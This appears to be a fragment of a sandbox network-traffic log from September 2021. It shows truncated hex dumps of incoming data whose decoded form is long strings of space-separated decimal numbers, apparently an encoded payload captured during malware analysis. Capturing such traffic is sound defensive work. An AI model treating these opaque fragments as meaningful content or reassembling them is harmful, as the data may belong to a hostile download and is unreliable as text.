                                                                                              2021-09-27 18:28:01 UTC3444INData Raw: 30 20 31 31 38 20 39 33 20 36 35 20 31 31 33 20 35 30 20 35 34 20 33 39 20 32 37 20 39 33 20 38 34 20 31 31 39 20 31 30 37 20 33 31 20 31 34 37 20 34 39 20 35 30 20 34 38 20 31 32 36 20 31 32 30 20 39 34 20 31 35 32 20 31 31 32 20 35 30 20 33 35 20 32 20 34 38 20 38 34 20 31 30 35 20 31 31 37 20 31 30 39 20 31 31 32 20 31 30 31 20 34 38 20 35 30 20 33 39 20 38 37 20 31 31 38 20 31 31 32 20 39 39 20 31 31 36 20 36 30 20 35 33 20 32 36 20 32 36 20 38 35 20 31 31 34 20 31 31 35 20 31 31 36 20 39 33 20 35 39 20 32 32 20 34 38 20 34 38 20 35 39 20 32 31 31 20 31 31 36 20 31 30 39 20 31 31 38 20 32 34 20 35 38 20 32 35 20 31 39 35 20 38 34 20 39 37 20 36 39 20 31 30 37 20 31 31 32 20 35 20 34 38 20 35 30 20 35 34 20 36 37 20 31 31 34 20 31 31 37 20 31 32 34 20
                                                                                              Data Ascii: 0 118 93 65 113 50 54 39 27 93 84 119 107 31 147 49 50 48 126 120 94 152 112 50 35 2 48 84 105 117 109 112 101 48 50 39 87 118 112 99 116 60 53 26 26 85 114 115 116 93 59 22 48 48 59 211 116 109 118 24 58 25 195 84 97 69 107 112 5 48 50 54 67 114 117 124
                                                                                              2021-09-27 18:28:01 UTC3448INData Raw: 20 31 30 39 20 31 31 36 20 32 36 20 31 32 20 35 31 20 35 34 20 39 34 20 31 32 31 20 31 30 33 20 31 30 38 20 38 38 20 31 35 20 34 39 20 35 30 20 36 30 20 31 32 34 20 35 35 20 31 31 36 20 31 30 39 20 31 31 38 20 39 34 20 37 20 33 39 20 32 39 20 38 33 20 32 34 32 20 35 39 20 31 30 39 20 31 31 32 20 35 34 20 32 37 20 32 33 38 20 37 32 20 32 33 20 31 31 34 20 31 31 37 20 31 30 35 20 33 31 20 31 34 35 20 34 39 20 35 30 20 34 38 20 31 32 37 20 31 31 39 20 39 33 20 31 32 32 20 31 31 33 20 35 30 20 35 34 20 32 34 20 33 37 20 31 30 30 20 31 31 33 20 31 31 37 20 38 34 20 31 31 32 20 35 30 20 34 38 20 31 31 30 20 35 34 20 38 34 20 39 39 20 38 35 20 37 37 20 36 32 20 35 30 20 34 38 20 32 36 20 32 33 32 20 38 34 20 31 31 34 20 31 32 37 20 37 37 20 31 31 33 20 35 30 20
                                                                                              Data Ascii: 109 116 26 12 51 54 94 121 103 108 88 15 49 50 60 124 55 116 109 118 94 7 39 29 83 242 59 109 112 54 27 238 72 23 114 117 105 31 145 49 50 48 127 119 93 122 113 50 54 24 37 100 113 117 84 112 50 48 110 54 84 99 85 77 62 50 48 26 232 84 114 127 77 113 50
                                                                                              2021-09-27 18:28:01 UTC3453INData Raw: 31 31 34 20 31 31 36 20 32 30 37 20 31 31 38 20 32 36 20 31 33 36 20 35 30 20 35 34 20 38 32 20 38 38 20 31 32 37 20 37 30 20 31 34 36 20 33 33 20 30 20 35 38 20 35 34 20 31 30 38 20 31 31 34 20 31 31 37 20 31 30 39 20 32 33 20 35 30 20 34 38 20 33 35 20 35 33 20 38 30 20 31 31 39 20 39 33 20 34 33 20 31 31 32 20 35 30 20 35 34 20 34 30 20 32 37 20 31 31 35 20 38 34 20 31 31 20 32 33 35 20 31 31 32 20 35 30 20 35 32 20 33 37 20 34 36 20 37 39 20 31 30 36 20 32 34 38 20 33 31 20 31 31 32 20 35 30 20 34 39 20 33 37 20 32 37 20 37 36 20 38 34 20 31 31 34 20 31 32 33 20 31 31 34 20 31 39 30 20 31 32 30 20 35 30 20 35 34 20 38 35 20 32 30 38 20 31 31 34 20 31 32 32 20 31 31 38 20 31 34 34 20 35 35 20 32 36 20 31 34 32 20 38 34 20 31 31 34 20 31 31 35 20 37 31
                                                                                              Data Ascii: 114 116 207 118 26 136 50 54 82 88 127 70 146 33 0 58 54 108 114 117 109 23 50 48 35 53 80 119 93 43 112 50 54 40 27 115 84 11 235 112 50 52 37 46 79 106 248 31 112 50 49 37 27 76 84 114 123 114 190 120 50 54 85 208 114 122 118 144 55 26 142 84 114 115 71
                                                                                              2021-09-27 18:28:01 UTC3457INData Raw: 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 39 20 31 31 33 20 31 30 33 20 33 31 20 32 33 20 32 30 20 32 32 20 32 31 37 20 31 34 32 20 31 39 38 20 33 35 20 32 32 20 38 37 20 38 36 20 38 37 20 38 30 20 35 30 20 32 33 20 31 36 20 31 31 20 34 31 20 34 39 20 33 39 20 34 36 20 32 37 20 36 35 20 38 34 20 38 35 20 31 33 30 20 31 36 37 20 31 39 39 20 32 34 31 20 38 34 20 38 30 20 34 39 20 32 33 20 31 39 20 31 31 20 32 31 20 38 34 20 38 35 20 31 30 36 20 38 37 20 31 32 36 20 38 34 20 39 34 20 31 38 36 20 38 36 20 32 35 20 32 31 37 20 35 30 20 35 34 20 38 37 20 36 36 20 31 32 37 20 31 30 39 20 39 35 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 31 20 31 30 39 20 34 33 20 32 39 20 31 39 20 31 36 20 38 37 20 31
                                                                                              Data Ascii: 2 50 48 50 54 84 114 119 113 103 31 23 20 22 217 142 198 35 22 87 86 87 80 50 23 16 11 41 49 39 46 27 65 84 85 130 167 199 241 84 80 49 23 19 11 21 84 85 106 87 126 84 94 186 86 25 217 50 54 87 66 127 109 95 50 48 50 54 84 114 117 111 109 43 29 19 16 87 1
                                                                                              2021-09-27 18:28:01 UTC3461INData Raw: 34 38 20 35 30 20 36 39 20 39 33 20 31 31 35 20 31 31 37 20 31 30 37 20 31 30 37 20 33 31 20 31 31 39 20 32 30 20 33 33 20 37 37 20 39 35 20 36 30 20 37 35 20 31 31 38 20 33 36 20 36 37 20 39 37 20 35 35 20 38 34 20 31 32 30 20 39 38 20 36 34 20 34 39 20 32 30 20 35 34 20 33 37 20 31 31 31 20 36 36 20 39 34 20 37 32 20 37 35 20 31 31 39 20 35 32 20 39 35 20 31 32 35 20 35 35 20 38 34 20 31 32 30 20 31 32 31 20 37 37 20 31 34 36 20 31 35 38 20 33 31 20 32 38 20 38 30 20 35 30 20 32 33 20 31 39 20 38 20 32 32 20 38 37 20 38 35 20 38 34 20 38 30 20 34 39 20 38 32 20 31 30 35 20 32 30 37 20 35 33 20 32 32 33 20 38 36 20 38 37 20 38 30 20 34 39 20 32 30 20 31 39 20 38 20 32 32 20 38 37 20 38 36 20 38 37 20 38 37 20 38 39 20 31 32 32 20 38 39 20 31 31 39 20 39
                                                                                              Data Ascii: 48 50 69 93 115 117 107 107 31 119 20 33 77 95 60 75 118 36 67 97 55 84 120 98 64 49 20 54 37 111 66 94 72 75 119 52 95 125 55 84 120 121 77 146 158 31 28 80 50 23 19 8 22 87 85 84 80 49 82 105 207 53 223 86 87 80 49 20 19 8 22 87 86 87 87 89 122 89 119 9
                                                                                              2021-09-27 18:28:01 UTC3465INData Raw: 30 31 20 31 31 37 20 31 39 20 31 30 32 20 39 38 20 31 34 20 31 30 34 20 34 38 20 35 30 20 35 30 20 35 39 20 31 31 35 20 31 31 36 20 31 30 39 20 31 31 38 20 33 35 20 36 33 20 38 38 20 38 39 20 32 20 31 31 35 20 31 31 37 20 31 30 33 20 31 34 20 31 30 35 20 34 38 20 35 30 20 35 30 20 31 32 30 20 31 32 36 20 31 31 20 35 34 20 31 31 32 20 35 30 20 35 32 20 33 33 20 33 38 20 31 30 38 20 35 20 31 31 37 20 31 30 39 20 31 31 32 20 37 36 20 31 30 38 20 35 30 20 35 34 20 38 30 20 31 30 33 20 37 30 20 31 31 37 20 31 34 20 31 30 34 20 34 38 20 35 30 20 35 30 20 35 39 20 31 31 32 20 31 31 36 20 31 30 39 20 31 31 38 20 31 38 20 31 34 30 20 32 34 32 20 32 30 31 20 31 37 31 20 31 39 20 31 30 30 20 39 38 20 31 37 20 39 30 20 33 35 20 33 35 20 32 39 20 38 33 20 31 32 20 34
                                                                                              Data Ascii: 01 117 19 102 98 14 104 48 50 50 59 115 116 109 118 35 63 88 89 2 115 117 103 14 105 48 50 50 120 126 11 54 112 50 52 33 38 108 5 117 109 112 76 108 50 54 80 103 70 117 14 104 48 50 50 59 112 116 109 118 18 140 242 201 171 19 100 98 17 90 35 35 29 83 12 4
                                                                                              2021-09-27 18:28:01 UTC3469INData Raw: 38 20 33 38 20 32 39 20 38 37 20 31 32 36 20 39 34 20 31 34 39 20 31 31 39 20 35 38 20 31 30 34 20 35 37 20 35 33 20 39 32 20 34 33 20 31 33 39 20 31 30 32 20 31 31 33 20 35 30 20 35 31 20 33 36 20 36 20 31 33 31 20 31 31 37 20 31 31 35 20 32 32 37 20 32 35 20 32 38 20 33 35 20 35 33 20 31 38 37 20 31 31 38 20 31 31 34 20 31 31 37 20 31 30 38 20 31 32 35 20 35 32 20 33 38 20 35 39 20 33 32 20 38 33 20 39 30 20 34 33 20 31 30 38 20 31 31 32 20 35 36 20 35 37 20 35 36 20 34 38 20 31 32 36 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 35 20 32 20 35 37 20 35 30 20 34 35 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 34 38 20 33 30 20 32 31 20 31 31 34 20 31 31 37 20 31 30 33 20 31 31 34 20 34 35 20 33 32 20 31 39 31 20 31 37 20
                                                                                              Data Ascii: 8 38 29 87 126 94 149 119 58 104 57 53 92 43 139 102 113 50 51 36 6 131 117 115 227 25 28 35 53 187 118 114 117 108 125 52 38 59 32 83 90 43 108 112 56 57 56 48 126 114 117 109 115 2 57 50 45 84 114 117 109 112 50 48 48 30 21 114 117 103 114 45 32 191 17
                                                                                              2021-09-27 18:28:01 UTC3473INData Raw: 20 35 31 20 36 35 20 31 38 20 35 34 20 38 34 20 31 31 35 20 39 36 20 36 34 20 31 32 31 20 32 30 20 35 34 20 33 30 20 31 32 35 20 31 32 37 20 31 31 36 20 31 32 36 20 37 30 20 31 35 31 20 35 36 20 32 37 20 31 39 39 20 34 39 20 31 32 34 20 32 33 33 20 31 31 37 20 31 30 39 20 31 31 38 20 34 32 20 32 39 20 35 37 20 31 36 20 39 32 20 39 30 20 30 20 31 30 39 20 31 31 32 20 35 36 20 32 39 20 35 37 20 32 39 20 38 37 20 31 32 36 20 39 34 20 31 35 38 20 31 32 30 20 32 36 20 33 38 20 35 31 20 35 34 20 38 32 20 31 37 32 20 38 31 20 37 32 20 38 38 20 31 32 36 20 34 38 20 35 30 20 36 30 20 38 39 20 31 31 37 20 39 33 20 32 34 31 20 31 31 32 20 35 30 20 35 34 20 35 39 20 32 32 20 31 36 30 20 38 39 20 31 36 35 20 31 31 35 20 38 38 20 32 30 35 20 34 38 20 35 30 20 34 38 20
                                                                                              Data Ascii: 51 65 18 54 84 115 96 64 121 20 54 30 125 127 116 126 70 151 56 27 199 49 124 233 117 109 118 42 29 57 16 92 90 0 109 112 56 29 57 29 87 126 94 158 120 26 38 51 54 82 172 81 72 88 126 48 50 60 89 117 93 241 112 50 54 59 22 160 89 165 115 88 205 48 50 48
                                                                                              2021-09-27 18:28:01 UTC3476INData Raw: 20 35 30 20 35 38 20 34 30 20 32 37 20 31 30 30 20 38 34 20 31 30 30 20 31 30 35 20 31 34 20 38 39 20 34 38 20 35 30 20 35 30 20 32 31 38 20 31 39 37 20 32 36 20 31 35 20 31 31 33 20 35 30 20 35 38 20 34 37 20 32 37 20 31 31 38 20 38 34 20 31 31 20 36 20 31 31 32 20 35 30 20 35 32 20 33 35 20 35 31 20 32 30 36 20 31 31 31 20 38 38 20 31 31 39 20 38 36 20 37 36 20 39 32 20 35 30 20 35 34 20 38 30 20 39 39 20 31 31 32 20 32 34 37 20 31 32 33 20 37 36 20 37 39 20 35 30 20 35 34 20 39 34 20 31 32 36 20 39 34 20 31 30 32 20 39 39 20 35 34 20 32 37 20 32 35 35 20 33 37 20 38 31 20 38 39 20 31 37 34 20 39 36 20 39 31 20 32 31 34 20 37 38 20 39 35 20 35 34 20 38 34 20 31 31 38 20 31 30 30 20 31 30 35 20 31 34 20 39 35 20 34 38 20 35 30 20 35 30 20 32 31 38 20 31
                                                                                              Data Ascii: 50 58 40 27 100 84 100 105 14 89 48 50 50 218 197 26 15 113 50 58 47 27 118 84 11 6 112 50 52 35 51 206 111 88 119 86 76 92 50 54 80 99 112 247 123 76 79 50 54 94 126 94 102 99 54 27 255 37 81 89 174 96 91 214 78 95 54 84 118 100 105 14 95 48 50 50 218 1
                                                                                              2021-09-27 18:28:01 UTC3480INData Raw: 31 31 35 20 39 33 20 34 33 20 31 31 32 20 35 30 20 35 38 20 34 34 20 38 39 20 35 37 20 31 31 35 20 31 31 37 20 31 30 33 20 31 34 20 36 38 20 34 38 20 35 30 20 35 30 20 31 33 32 20 32 32 37 20 31 31 37 20 31 30 39 20 31 31 33 20 32 36 20 31 31 38 20 35 30 20 35 34 20 39 34 20 31 30 39 20 31 32 34 20 32 20 32 39 20 35 31 20 34 38 20 35 36 20 37 32 20 33 34 20 31 31 34 20 31 31 37 20 31 30 35 20 31 36 30 20 31 32 31 20 34 38 20 35 30 20 35 35 20 31 32 34 20 35 32 20 31 31 37 20 31 30 39 20 31 32 32 20 34 35 20 35 38 20 39 33 20 39 31 20 38 35 20 31 31 34 20 31 32 37 20 31 39 20 36 20 35 30 20 34 38 20 35 34 20 32 33 30 20 32 35 33 20 31 31 34 20 31 31 37 20 31 30 38 20 38 38 20 31 31 36 20 34 38 20 35 30 20 36 30 20 37 35 20 31 32 31 20 32 36 20 30 20 31 31
                                                                                              Data Ascii: 115 93 43 112 50 58 44 89 57 115 117 103 14 68 48 50 50 132 227 117 109 113 26 118 50 54 94 109 124 2 29 51 48 56 72 34 114 117 105 160 121 48 50 55 124 52 117 109 122 45 58 93 91 85 114 127 19 6 50 48 54 230 253 114 117 108 88 116 48 50 60 75 121 26 0 11
                                                                                              2021-09-27 18:28:01 UTC3485INData Raw: 34 20 38 30 20 31 32 34 20 31 31 33 20 31 32 34 20 31 31 37 20 31 36 38 20 37 33 20 31 34 30 20 35 34 20 38 34 20 31 31 35 20 34 20 32 31 31 20 31 31 32 20 35 30 20 34 39 20 39 33 20 31 38 31 20 38 35 20 31 31 34 20 31 32 37 20 38 35 20 38 20 35 31 20 34 38 20 35 30 20 37 32 20 33 39 20 31 31 34 20 31 31 37 20 31 30 35 20 31 32 36 20 35 34 20 33 33 20 35 35 20 31 37 32 20 34 35 20 32 30 36 20 31 31 37 20 31 30 39 20 31 31 33 20 36 37 20 31 34 30 20 35 30 20 35 34 20 38 35 20 32 39 20 32 34 31 20 31 30 38 20 31 31 32 20 35 36 20 38 20 31 30 34 20 35 35 20 38 34 20 31 31 34 20 31 31 20 33 30 20 31 31 32 20 35 30 20 35 32 20 36 30 20 35 30 20 36 39 20 31 31 39 20 32 33 39 20 32 30 20 36 36 20 35 30 20 34 38 20 35 31 20 37 31 20 31 30 32 20 31 31 34 20 31 31
                                                                                              Data Ascii: 4 80 124 113 124 117 168 73 140 54 84 115 4 211 112 50 49 93 181 85 114 127 85 8 51 48 50 72 39 114 117 105 126 54 33 55 172 45 206 117 109 113 67 140 50 54 85 29 241 108 112 56 8 104 55 84 114 11 30 112 50 52 60 50 69 119 239 20 66 50 48 51 71 102 114 11
                                                                                              2021-09-27 18:28:01 UTC3489INData Raw: 35 39 20 32 32 39 20 31 31 36 20 31 30 39 20 31 32 32 20 31 39 30 20 31 33 20 35 30 20 35 34 20 38 35 20 32 39 20 34 36 20 31 30 39 20 31 31 32 20 35 36 20 38 20 33 30 20 35 32 20 38 34 20 31 31 34 20 31 31 20 32 34 20 31 31 32 20 35 30 20 35 32 20 37 36 20 37 31 20 38 34 20 31 31 34 20 31 31 33 20 32 20 31 38 35 20 35 30 20 34 38 20 35 36 20 31 38 36 20 32 34 20 31 31 34 20 31 31 37 20 31 30 38 20 33 31 20 31 30 35 20 34 38 20 35 30 20 36 30 20 31 30 38 20 31 32 34 20 31 31 39 20 31 30 39 20 31 31 32 20 37 36 20 36 39 20 35 30 20 35 34 20 38 30 20 31 32 20 34 20 31 30 39 20 31 31 32 20 35 34 20 39 35 20 31 37 30 20 35 35 20 38 34 20 31 32 30 20 32 34 39 20 33 32 20 31 31 32 20 35 30 20 34 39 20 39 33 20 31 30 39 20 38 34 20 31 31 34 20 31 32 37 20 38 35
                                                                                              Data Ascii: 59 229 116 109 122 190 13 50 54 85 29 46 109 112 56 8 30 52 84 114 11 24 112 50 52 76 71 84 114 113 2 185 50 48 56 186 24 114 117 108 31 105 48 50 60 108 124 119 109 112 76 69 50 54 80 12 4 109 112 54 95 170 55 84 120 249 32 112 50 49 93 109 84 114 127 85
                                                                                              2021-09-27 18:28:01 UTC3493INData Raw: 20 35 31 20 39 33 20 38 31 20 38 34 20 31 31 34 20 31 32 37 20 31 37 39 20 38 36 20 32 33 20 32 34 20 31 32 36 20 35 34 20 38 34 20 31 32 30 20 31 30 32 20 31 30 36 20 31 31 35 20 37 33 20 33 37 20 35 30 20 35 34 20 38 30 20 39 39 20 31 31 34 20 37 37 20 32 33 33 20 33 30 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 38 38 20 31 32 39 20 34 38 20 35 30 20 34 38 20 31 32 34 20 31 39 20 31 31 37 20 31 30 39 20 31 32 32 20 32 33 36 20 34 38 20 32 34 20 38 39 20 31 39 35 20 35 31 20 31 30 35 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 37 35 20 34 38 20 34 38 20 35 30 20 31 33 20 38 36 20 31 31 34 20 31 31 37 20 37 35 20 31 31 32 20 35 30 20 34 38 20 31 31 36 20
                                                                                              Data Ascii: 51 93 81 84 114 127 179 86 23 24 126 54 84 120 102 106 115 73 37 50 54 80 99 114 77 233 30 224 44 30 171 114 117 107 88 129 48 50 48 124 19 117 109 122 236 48 24 89 195 51 105 109 112 50 48 50 54 84 114 117 109 75 48 48 50 13 86 114 117 75 112 50 48 116
                                                                                              2021-09-27 18:28:01 UTC3497INData Raw: 37 20 37 33 20 31 31 32 20 35 30 20 34 38 20 36 32 20 35 34 20 38 34 20 39 39 20 38 35 20 31 30 39 20 39 34 20 32 32 36 20 34 36 20 32 36 20 32 30 31 20 38 34 20 31 31 34 20 31 31 35 20 37 37 20 34 38 20 34 35 20 34 38 20 35 30 20 31 38 36 20 32 34 20 31 31 34 20 31 31 37 20 31 30 38 20 38 38 20 39 37 20 34 39 20 35 30 20 34 38 20 34 35 20 36 32 20 31 31 37 20 31 30 39 20 31 31 33 20 36 37 20 31 32 34 20 35 30 20 35 34 20 38 35 20 38 38 20 31 30 32 20 39 33 20 31 31 34 20 35 30 20 32 30 20 35 30 20 35 34 20 38 34 20 31 32 36 20 31 31 37 20 31 30 39 20 39 37 20 31 38 20 33 20 32 38 20 32 33 30 20 37 34 20 39 30 20 31 33 38 20 31 30 39 20 31 31 32 20 35 32 20 31 36 20 32 30 35 20 32 30 31 20 38 34 20 31 31 34 20 32 34 39 20 33 33 20 31 31 32 20 35 30 20 34
                                                                                              Data Ascii: 7 73 112 50 48 62 54 84 99 85 109 94 226 46 26 201 84 114 115 77 48 45 48 50 186 24 114 117 108 88 97 49 50 48 45 62 117 109 113 67 124 50 54 85 88 102 93 114 50 20 50 54 84 126 117 109 97 18 3 28 230 74 90 138 109 112 52 16 205 201 84 114 249 33 112 50 4
                                                                                              2021-09-27 18:28:01 UTC3501INData Raw: 33 20 31 32 30 20 38 34 20 31 31 34 20 31 32 37 20 32 20 31 37 37 20 35 31 20 34 38 20 35 36 20 31 36 20 38 33 20 32 39 20 31 38 33 20 31 30 38 20 31 31 32 20 35 36 20 32 32 20 35 33 20 35 32 20 35 39 20 31 37 37 20 31 31 36 20 31 30 39 20 31 32 32 20 39 33 20 32 34 34 20 35 31 20 35 34 20 39 34 20 32 39 20 31 38 30 20 31 30 38 20 31 31 32 20 35 36 20 32 32 20 35 33 20 35 32 20 35 39 20 39 33 20 31 31 36 20 31 30 39 20 31 32 32 20 39 33 20 32 34 31 20 35 31 20 35 34 20 39 34 20 38 34 20 31 31 39 20 32 20 36 31 20 35 30 20 34 38 20 35 36 20 32 36 20 37 34 20 38 39 20 31 31 38 20 31 30 32 20 39 31 20 32 34 32 20 35 35 20 39 33 20 32 34 34 20 38 35 20 31 31 34 20 31 32 37 20 37 35 20 31 31 39 20 34 38 20 39 35 20 31 32 37 20 35 34 20 38 34 20 31 32 30 20 39
                                                                                              Data Ascii: 3 120 84 114 127 2 177 51 48 56 16 83 29 183 108 112 56 22 53 52 59 177 116 109 122 93 244 51 54 94 29 180 108 112 56 22 53 52 59 93 116 109 122 93 241 51 54 94 84 119 2 61 50 48 56 26 74 89 118 102 91 242 55 93 244 85 114 127 75 119 48 95 127 54 84 120 9
                                                                                              2021-09-27 18:28:01 UTC3505INData Raw: 20 31 31 32 20 35 36 20 36 38 20 31 33 20 35 34 20 38 34 20 31 31 32 20 31 31 31 20 36 34 20 31 31 35 20 32 30 20 32 32 20 32 34 20 37 35 20 31 39 33 20 31 31 34 20 31 31 37 20 31 30 35 20 39 31 20 32 30 32 20 34 38 20 34 39 20 36 20 39 33 20 31 31 34 20 31 30 36 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 32 20 31 31 39 20 32 32 20 32 33 30 20 35 30 20 34 38 20 35 34 20 35 33 20 31 32 34 20 32 34 37 20 31 31 37 20 31 30 39 20 31 32 32 20 37 30 20 31 32 20 35 30 20 35 34 20 38 36 20 31 31 30 20 38 38 20 31 31 30 20 38 36 20 32 30 20 32 36 20 37 39 20 31 36 30 20 38 34 20 31 31 34 20 31 31 33 20 37 30 20 31 33 36 20 35 30 20 35 31 20 32 20 36 33 20 38 34 20 31 30 39 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20
                                                                                              Data Ascii: 112 56 68 13 54 84 112 111 64 115 20 22 24 75 193 114 117 105 91 202 48 49 6 93 114 106 109 112 50 48 50 54 84 112 119 22 230 50 48 54 53 124 247 117 109 122 70 12 50 54 86 110 88 110 86 20 26 79 160 84 114 113 70 136 50 51 2 63 84 109 117 109 112 50 48
                                                                                              2021-09-27 18:28:01 UTC3508INData Raw: 20 35 34 20 37 31 20 36 36 20 31 31 38 20 31 30 39 20 31 32 37 20 35 30 20 34 38 20 35 30 20 35 38 20 38 34 20 31 31 34 20 31 30 30 20 31 31 31 20 31 30 39 20 34 31 20 32 39 20 35 33 20 31 36 20 34 37 20 32 31 31 20 31 31 37 20 31 30 39 20 31 31 36 20 32 34 20 32 32 20 32 35 20 31 39 33 20 38 34 20 31 31 33 20 36 39 20 31 30 30 20 31 31 32 20 36 31 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 34 20 34 39 20 33 38 20 33 30 20 35 33 20 31 31 34 20 38 34 20 39 35 20 31 36 20 32 30 39 20 35 30 20 34 38 20 35 34 20 32 39 20 31 37 32 20 31 31 34 20 31 30 32 20 39 33 20 31 31 35 20 35 30 20 36 33 20 35 30 20 35 34 20 38 34 20 31 32 36 20 31 31 37 20 31 30 39 20 39 37 20 34 38 20 33 39 20 33 36 20 32 36 20 38 33 20 38 34 20 31
                                                                                              Data Ascii: 54 71 66 118 109 127 50 48 50 58 84 114 100 111 109 41 29 53 16 47 211 117 109 116 24 22 25 193 84 113 69 100 112 61 48 50 54 84 114 117 109 114 49 38 30 53 114 84 95 16 209 50 48 54 29 172 114 102 93 115 50 63 50 54 84 126 117 109 97 48 39 36 26 83 84 1
                                                                                              2021-09-27 18:28:01 UTC3512INData Raw: 34 39 20 31 31 34 20 31 31 37 20 31 30 35 20 39 32 20 35 35 20 32 33 37 20 31 38 34 20 35 34 20 38 34 20 31 31 34 20 31 31 32 20 31 31 36 20 39 33 20 35 38 20 32 32 20 33 36 20 33 32 20 31 32 30 20 31 31 36 20 38 33 20 37 30 20 37 39 20 36 33 20 32 37 20 31 39 36 20 35 38 20 31 32 37 20 31 33 38 20 31 32 34 20 31 30 31 20 32 33 34 20 34 36 20 32 39 20 36 32 20 31 36 20 38 32 20 32 39 20 36 34 20 31 30 39 20 31 31 32 20 35 36 20 34 30 20 31 20 31 39 20 31 32 37 20 31 31 33 20 31 32 37 20 37 30 20 31 33 30 20 34 38 20 37 35 20 31 36 36 20 35 34 20 38 34 20 31 31 38 20 31 30 32 20 31 30 35 20 39 37 20 35 34 20 32 38 20 35 36 20 33 39 20 38 30 20 31 31 32 20 31 31 38 20 31 30 37 20 33 31 20 32 34 32 20 34 39 20 35 30 20 34 38 20 38 36 20 31 31 36 20 31 31 33
                                                                                              Data Ascii: 49 114 117 105 92 55 237 184 54 84 114 112 116 93 58 22 36 32 120 116 83 70 79 63 27 196 58 127 138 124 101 234 46 29 62 16 82 29 64 109 112 56 40 1 19 127 113 127 70 130 48 75 166 54 84 118 102 105 97 54 28 56 39 80 112 118 107 31 242 49 50 48 86 116 113
                                                                                              2021-09-27 18:28:01 UTC3517INData Raw: 39 20 31 31 36 20 32 33 36 20 33 32 20 34 38 20 38 39 20 32 34 36 20 31 31 35 20 31 31 37 20 31 30 37 20 31 37 34 20 35 38 20 33 33 20 35 32 20 33 30 20 32 32 32 20 31 31 34 20 31 31 37 20 31 30 33 20 31 37 32 20 32 33 36 20 39 36 20 34 38 20 37 37 20 32 30 37 20 31 31 34 20 31 31 37 20 31 30 35 20 39 39 20 35 33 20 33 33 20 35 33 20 32 36 20 37 31 20 39 39 20 31 31 34 20 31 31 31 20 31 31 36 20 39 33 20 32 30 39 20 35 31 20 35 34 20 39 34 20 31 20 31 35 37 20 31 30 38 20 31 31 32 20 35 36 20 39 35 20 32 35 34 20 35 35 20 38 34 20 31 31 36 20 31 31 39 20 32 20 32 31 31 20 35 31 20 34 38 20 35 32 20 32 33 32 20 31 32 35 20 38 37 20 39 33 20 33 33 20 31 31 32 20 35 30 20 35 38 20 35 37 20 35 32 20 34 37 20 32 33 33 20 31 31 37 20 31 30 39 20 31 31 36 20 33
                                                                                              Data Ascii: 9 116 236 32 48 89 246 115 117 107 174 58 33 52 30 222 114 117 103 172 236 96 48 77 207 114 117 105 99 53 33 53 26 71 99 114 111 116 93 209 51 54 94 1 157 108 112 56 95 254 55 84 116 119 2 211 51 48 52 232 125 87 93 33 112 50 58 57 52 47 233 117 109 116 3
                                                                                              2021-09-27 18:28:01 UTC3521INData Raw: 37 20 31 31 31 20 31 30 30 20 37 39 20 31 35 37 20 35 30 20 35 34 20 38 30 20 31 31 32 20 31 34 20 31 39 35 20 31 31 32 20 35 30 20 35 32 20 33 30 20 33 36 20 38 36 20 39 20 32 31 39 20 31 30 39 20 31 31 32 20 35 34 20 39 35 20 32 33 36 20 35 35 20 38 34 20 31 32 30 20 31 31 39 20 31 32 31 20 31 33 20 31 35 36 20 34 38 20 35 30 20 35 30 20 38 36 20 39 20 32 31 38 20 31 30 39 20 31 31 32 20 35 34 20 32 38 20 33 32 20 35 32 20 34 37 20 32 32 31 20 31 31 37 20 31 30 39 20 31 31 36 20 39 33 20 32 33 38 20 35 31 20 35 34 20 39 34 20 31 31 32 20 39 37 20 31 36 20 32 32 33 20 35 30 20 34 38 20 35 34 20 35 32 20 34 37 20 31 39 34 20 31 31 37 20 31 30 39 20 31 31 36 20 33 30 20 33 34 20 34 38 20 37 37 20 32 32 38 20 31 31 34 20 31 31 37 20 31 30 35 20 33 31 20 32
                                                                                              Data Ascii: 7 111 100 79 157 50 54 80 112 14 195 112 50 52 30 36 86 9 219 109 112 54 95 236 55 84 120 119 121 13 156 48 50 50 86 9 218 109 112 54 28 32 52 47 221 117 109 116 93 238 51 54 94 112 97 16 223 50 48 54 52 47 194 117 109 116 30 34 48 77 228 114 117 105 31 2
                                                                                              2021-09-27 18:28:01 UTC3525INData Raw: 37 31 20 32 32 20 31 38 35 20 36 31 20 31 34 31 20 31 34 37 20 31 37 31 20 31 34 32 20 31 30 32 20 32 30 39 20 35 33 20 32 31 31 20 32 31 34 20 32 33 32 20 31 30 38 20 31 39 30 20 32 35 34 20 31 37 38 20 32 30 30 20 36 37 20 33 32 20 32 30 37 20 31 34 35 20 32 30 38 20 35 39 20 31 38 33 20 32 31 30 20 31 35 38 20 31 32 37 20 32 30 37 20 34 31 20 31 33 36 20 31 31 37 20 31 36 20 39 36 20 35 34 20 32 30 36 20 32 31 33 20 31 36 35 20 31 35 31 20 32 32 38 20 31 32 30 20 31 35 30 20 32 30 30 20 31 33 34 20 32 30 38 20 33 20 32 30 37 20 31 37 36 20 32 32 38 20 33 34 20 35 32 20 31 32 33 20 32 33 35 20 32 30 39 20 32 31 20 31 36 30 20 31 36 31 20 32 30 33 20 31 31 33 20 32 33 37 20 31 38 35 20 31 33 30 20 32 33 20 31 32 31 20 31 31 38 20 31 33 30 20 33 38 20 31
                                                                                              Data Ascii: 71 22 185 61 141 147 171 142 102 209 53 211 214 232 108 190 254 178 200 67 32 207 145 208 59 183 210 158 127 207 41 136 117 16 96 54 206 213 165 151 228 120 150 200 134 208 3 207 176 228 34 52 123 235 209 21 160 161 203 113 237 185 130 23 121 118 130 38 1
